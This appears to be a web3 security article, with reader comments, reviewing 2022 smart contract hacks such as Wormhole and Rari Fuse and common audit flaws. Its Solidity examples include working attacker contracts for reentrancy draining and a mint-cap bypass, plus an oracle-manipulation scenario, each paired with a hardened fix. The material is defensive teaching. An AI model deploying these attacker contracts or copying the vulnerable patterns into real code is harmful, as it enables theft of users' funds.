Web3 Security Alert: Analysis of Hacker Attack Methods and Prevention Strategies in the First Half of 2022


In the first half of 2022 the security picture in Web3 was bleak. Smart contract vulnerabilities alone accounted for roughly $644 million in losses across 42 major incidents. Across those attacks, logical or functional design flaws, missing or incorrect verification, and reentrancy were the weaknesses hackers exploited most often.

"Anonymous" tactics analysis: What are the common attack methods used by Web3 Hackers in the first half of 2022?

Analysis of Major Loss Cases

  1. Solana cross-chain bridge Wormhole was attacked: In February 2022 the attacker bypassed the bridge's guardian signature verification on Solana by passing a forged account in place of the expected system account, then used the forged approval to mint 120,000 wETH with no backing, a loss of approximately $326 million.

  2. Rari Fuse Pool under Fei Protocol was attacked: In April 2022 an attacker combined a flash loan with a reentrancy attack to steal assets worth $80.34 million. The blow was severe enough that Fei Protocol announced its wind-down in August.

Fei Protocol attack details:

  • The attacker first takes a flash loan of ETH from the Balancer Vault.
  • The borrowed funds are deposited as collateral in a Rari Fuse pool and borrowed against. The pool's cEther contract is reentrant because it sends the borrowed ETH to the caller before it records the borrow.
  • The ETH transfer invokes the attacker contract's fallback, which re-enters the pool and calls exitMarket; no debt has been written yet, so the pool releases the collateral. Repeating this across the affected pools drains them.
  • Finally the flash loan is repaid and the profit is moved to the designated contract.

The core of this attack is an ordering bug in the cEther implementation used by Rari Capital's Fuse pools: an external ETH transfer happens before borrow state is updated, a textbook violation of Checks-Effects-Interactions. In total more than 28,380 ETH (approximately $80.34 million) was stolen.
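The step sequence above, as an added reconstruction written for this page (it is not Rari Capital's or Compound's code): a single-asset lending pool whose borrow() pays out before it records the debt, an attacker contract that re-enters exitMarket() from its receive() hook, and a hardened pool that applies Checks-Effects-Interactions plus a reentrancy guard. The contract names, the 1:1 collateral ratio, the assumption that other users have already supplied liquidity, and the omission of the flash-loan amplification are all simplifications made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Added example, not Rari Capital / Compound code. ASSUMPTIONS: ETH is both the
// collateral and the borrowed asset at a 1:1 collateral ratio, other users have
// already deposited liquidity, and the flash loan used in the real attack is
// left out. Contract and function names are illustrative.

// VULNERABLE: borrow() makes the external ETH transfer before it records the
// debt, so a contract borrower can re-enter from its receive() while its debt
// still reads zero and pull its collateral back out through exitMarket().
contract VulnerableLendingPool {
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;

    function deposit() external payable {
        collateral[msg.sender] += msg.value;
    }

    function borrow(uint256 amount) external {
        require(collateral[msg.sender] >= debt[msg.sender] + amount, "undercollateralized");
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction first ...
        require(ok, "transfer failed");
        debt[msg.sender] += amount;                       // ... effect last (the bug)
    }

    // Releases all collateral once the caller owes nothing. During the re-entrant
    // call from borrow() the debt has not been written yet, so this check passes.
    function exitMarket() external {
        require(debt[msg.sender] == 0, "outstanding debt");
        uint256 amount = collateral[msg.sender];
        collateral[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Attacker: deposit X, borrow X, and during the borrow payout re-enter once to
// exit the market. Result: 2X received, X of debt recorded against 0 collateral.
contract Attacker {
    VulnerableLendingPool public immutable pool;
    bool private reentered;

    constructor(VulnerableLendingPool _pool) { pool = _pool; }

    function attack() external payable {
        pool.deposit{value: msg.value}();
        pool.borrow(msg.value);   // triggers receive() below before debt is recorded
    }

    receive() external payable {
        if (!reentered) {         // re-enter exactly once; the exitMarket payout
            reentered = true;     // also lands here and must not recurse again
            pool.exitMarket();
        }
    }
}

// HARDENED: Checks-Effects-Interactions ordering plus a mutex. Either change on
// its own closes this particular hole; using both is defence in depth.
contract HardenedLendingPool {
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;
    uint256 private locked = 1;

    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    function deposit() external payable {
        collateral[msg.sender] += msg.value;
    }

    function borrow(uint256 amount) external nonReentrant {
        require(collateral[msg.sender] >= debt[msg.sender] + amount, "undercollateralized"); // check
        debt[msg.sender] += amount;                                                          // effect
        (bool ok, ) = msg.sender.call{value: amount}("");                                    // interaction
        require(ok, "transfer failed");
    }

    function exitMarket() external nonReentrant {
        require(debt[msg.sender] == 0, "outstanding debt");
        uint256 amount = collateral[msg.sender];
        collateral[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```

Deploy VulnerableLendingPool, fund it from a second account via deposit(), then call Attacker.attack() with 1 ETH: the attacker ends with 2 ETH and the pool with a 1 ETH debt it can never collect. The same sequence against HardenedLendingPool reverts with "outstanding debt" (the debt is already recorded) or "reentrant call" (the mutex is held), which is exactly what the Fuse cEther contract should have done.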


Common Vulnerability Types in Audits

  1. ERC721/ERC1155 Reentrancy Attack: _safeMint(), safeTransferFrom() and their ERC1155 counterparts call onERC721Received()/onERC1155Received() on a receiving contract. If that hook calls back into the minting or transferring contract before the contract has updated its own state (for example a per-wallet mint counter), the result is a reentrancy attack.

  2. Logical Flaw:

    • Special scenarios not considered, for example a self-transfer (sender equals recipient) that reads both balances first and then writes the increased recipient balance last, crediting the account and creating assets out of thin air.
    • Incomplete functional design, for example no withdrawal or settlement mechanism.

  3. Missing access control: Key operations (such as minting, role settings, parameter adjustments) have no appropriate permission checks, so any caller can invoke them.

  4. Price Manipulation Risk:

    • Oracles that report an instantaneous price rather than a time-weighted average.
    • Using the asset ratio held in a contract (for example an AMM pool's reserve ratio) directly as the price basis; that ratio can be shifted within a single transaction, typically with a flash loan.
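The receiver-hook reentrancy from item 1 above, as an added example written for this page (not any project's code): a mint with a per-wallet cap that increments its counter only after _safeMint(), an attacker contract that re-enters mint() from onERC721Received(), and a hardened mint that updates the counter first and adds a mutex. Only the hook path of ERC721's _safeMint is modelled, so the file is self-contained; with a full ERC721 such as OpenZeppelin's the bug and the fix are identical. Names and the cap of 1 are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Added example, not any project's code. Only the receiver-hook path of ERC721's
// _safeMint is modelled (no approvals, transfers or events) to keep the file
// self-contained. Contract names and MAX_PER_WALLET are illustrative.

interface IERC721Receiver {
    function onERC721Received(address operator, address from, uint256 tokenId, bytes calldata data)
        external returns (bytes4);
}

abstract contract MinimalERC721 {
    mapping(uint256 => address) public ownerOf;
    uint256 public nextId;

    // Mirrors _safeMint: assign the token, then call the hook if `to` is a contract.
    function _safeMint(address to, uint256 id) internal {
        ownerOf[id] = to;
        if (to.code.length > 0) {
            bytes4 ret = IERC721Receiver(to).onERC721Received(msg.sender, address(0), id, "");
            require(ret == IERC721Receiver.onERC721Received.selector, "unsafe receiver");
        }
    }
}

// VULNERABLE: the per-wallet counter is incremented after _safeMint, i.e. after
// the external call. A receiver contract can call mint() again from its hook
// while minted[msg.sender] still reads 0.
contract VulnerableMint is MinimalERC721 {
    uint256 public constant MAX_PER_WALLET = 1;
    mapping(address => uint256) public minted;

    function mint() external {
        require(minted[msg.sender] < MAX_PER_WALLET, "wallet limit");
        uint256 id = nextId++;
        _safeMint(msg.sender, id);   // interaction
        minted[msg.sender] += 1;     // effect (too late)
    }
}

// Attacker: a single call to attack() yields WANT tokens despite MAX_PER_WALLET == 1,
// because each nested mint() sees the counter still at 0.
contract MintAttacker is IERC721Receiver {
    VulnerableMint public immutable target;
    uint256 public constant WANT = 5;
    uint256 private reentries;

    constructor(VulnerableMint _target) { target = _target; }

    function attack() external { target.mint(); }

    function onERC721Received(address, address, uint256, bytes calldata)
        external override returns (bytes4)
    {
        if (reentries < WANT - 1) {
            reentries++;
            target.mint();   // nested mint: the counter has not been updated yet
        }
        return IERC721Receiver.onERC721Received.selector;
    }
}

// HARDENED: update the counter before the external call, and add a mutex.
contract HardenedMint is MinimalERC721 {
    uint256 public constant MAX_PER_WALLET = 1;
    mapping(address => uint256) public minted;
    uint256 private locked = 1;

    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    function mint() external nonReentrant {
        require(minted[msg.sender] < MAX_PER_WALLET, "wallet limit"); // check
        minted[msg.sender] += 1;                                      // effect
        uint256 id = nextId++;
        _safeMint(msg.sender, id);                                    // interaction
    }
}
```

Against VulnerableMint, MintAttacker.attack() leaves the attacker owning token IDs 0 through 4 with minted[attacker] == 5. Against HardenedMint the nested call reverts on the mutex, and even without the mutex the counter is already 1 when the hook runs, so the "wallet limit" check fails. Note that the counter-first ordering is the real fix; the mutex is there for the functions where an external call genuinely has to happen before all state can be settled.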


Exploitation of Vulnerabilities in Real Attacks

Statistics show that nearly every vulnerability class found during audits has also been exploited in production, with contract logic flaws still the primary target.

It is worth noting that most of these vulnerabilities can be caught during development by combining formal verification tooling for smart contracts with manual review by security experts. Reviewers can also recommend fixes tailored to the specific code, helping project teams raise the security of their contracts before deployment.


Prevention Suggestions

  1. Strengthen code auditing: Conduct regular comprehensive security audits, with a particular focus on logical design and handling of special scenarios.

  2. Implement strict access control: Set up protection mechanisms such as multi-signature or time locks for critical functions.

  3. Optimize Price Oracles: Use decentralized oracles and time-weighted average prices rather than a pool's current reserve ratio, so that a price cannot be moved far enough within one transaction to matter.

  4. Follow secure coding practices: Apply the Checks-Effects-Interactions pattern (validate inputs, update state, then make external calls) and add a reentrancy guard to functions that must call untrusted contracts.

  5. Continuous Monitoring: Deploy a real-time monitoring system to promptly detect and respond to abnormal activities.
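The price-oracle point in item 3 above, and the "asset ratio as price" risk from the vulnerability list, as an added example written for this page (not any project's code): a toy constant-product pool that also maintains a Uniswap V2-style cumulative price, a vault that values collateral at the pool's spot reserve ratio, and a vault that values it with a time-weighted average over a fixed window. The pool, the 30-minute window, the absence of swap fees and the use of checked (non-wrapping) arithmetic for the accumulator are all simplifications for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Added example, not any project's code. ASSUMPTIONS: no swap fee, prices are
// 1e18-scaled, the cumulative accumulator uses checked arithmetic (Uniswap V2
// deliberately lets it wrap), and WINDOW is illustrative.

// Minimal x*y=k pool that records a cumulative price so a TWAP can be built on it.
contract ToyPool {
    uint256 public reserve0;          // collateral token
    uint256 public reserve1;          // quote token (e.g. a stablecoin)
    uint256 public price0Cumulative;  // sum over time of spotPrice0() * seconds
    uint256 public lastTimestamp;

    constructor(uint256 r0, uint256 r1) {
        reserve0 = r0;
        reserve1 = r1;
        lastTimestamp = block.timestamp;
    }

    // Instantaneous price of token0 in token1, 1e18-scaled: what a naive oracle reads.
    function spotPrice0() public view returns (uint256) {
        return reserve1 * 1e18 / reserve0;
    }

    function _accumulate() internal {
        uint256 elapsed = block.timestamp - lastTimestamp;
        if (elapsed > 0) {
            price0Cumulative += spotPrice0() * elapsed;
            lastTimestamp = block.timestamp;
        }
    }

    // Sell token1 for token0. A large amount1In pushes spotPrice0() up sharply.
    function swap1For0(uint256 amount1In) external returns (uint256 amount0Out) {
        _accumulate();
        uint256 k = reserve0 * reserve1;
        reserve1 += amount1In;
        amount0Out = reserve0 - k / reserve1;
        reserve0 -= amount0Out;
    }

    function sync() external { _accumulate(); }
}

// VULNERABLE: values collateral at the current reserve ratio. A flash loan can
// move that ratio within one transaction, inflating what the vault will lend.
contract SpotPricedVault {
    ToyPool public immutable pool;

    constructor(ToyPool p) { pool = p; }

    function collateralValue(uint256 amount0) external view returns (uint256) {
        return amount0 * pool.spotPrice0() / 1e18;
    }
}

// HARDENED: values collateral at the average price over the last full window.
// A one-block spike contributes only its few seconds to the average, and the
// window cannot be skipped because update() refuses to run early.
contract TwapPricedVault {
    ToyPool public immutable pool;
    uint256 public constant WINDOW = 30 minutes;
    uint256 private cumulativeLast;
    uint256 private timestampLast;
    uint256 public price0Average;   // last finalised TWAP, 1e18-scaled

    // ASSUMPTION: deployment does not happen in a block where the pool is
    // already manipulated; the bootstrap value below is the one spot reading used.
    constructor(ToyPool p) {
        pool = p;
        p.sync();
        cumulativeLast = p.price0Cumulative();
        timestampLast = block.timestamp;
        price0Average = p.spotPrice0();
    }

    function update() external {
        uint256 elapsed = block.timestamp - timestampLast;
        require(elapsed >= WINDOW, "window not elapsed");
        pool.sync();                                   // bring the accumulator up to now
        uint256 cumulative = pool.price0Cumulative();
        price0Average = (cumulative - cumulativeLast) / elapsed;
        cumulativeLast = cumulative;
        timestampLast = block.timestamp;
    }

    function collateralValue(uint256 amount0) external view returns (uint256) {
        return amount0 * price0Average / 1e18;
    }
}
```

The manipulation this guards against is a single transaction that calls swap1For0 with a flash-loaned amount, borrows from SpotPricedVault against collateral the vault now overvalues, and swaps back. TwapPricedVault.collateralValue() does not change inside that transaction at all; the spike only enters price0Average at the next update(), weighted by the seconds it lasted against a 30-minute window. In production you would read a real pool's price cumulatives (or a decentralised oracle) rather than this toy, but the window and update discipline are the same.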

By taking these measures, Web3 projects can significantly raise their security and reduce the risk of becoming targets. As the technology continues to evolve, staying vigilant and continuously updating the security strategy will be key to the long-term stable operation of a project.

GasWastervip · 07-18 07:16
Oh no, another year of hackers playing people for suckers.

PumpStrategistvip · 07-18 06:52
The vulnerabilities are written so clearly that even hackers would drool over them.

LightningClickervip · 07-18 02:16
Keep the on-chain little secret.

GasFeeCryvip · 07-15 15:27
Where there is a lock, there is a key. Remember to get insurance!

AirdropHunterXiaovip · 07-15 15:24
Another wave of big bulls being played for suckers.

NotAFinancialAdvicevip · 07-15 15:18
Burning money to reach new heights, so exciting!

TrustMeBrovip · 07-15 15:08
I haven't written smart contracts for long, but I was indeed startled by this data.

GateUser-a5fa8bd0vip · 07-15 15:03
This hacker is just too greedy, starting with a few hundred million.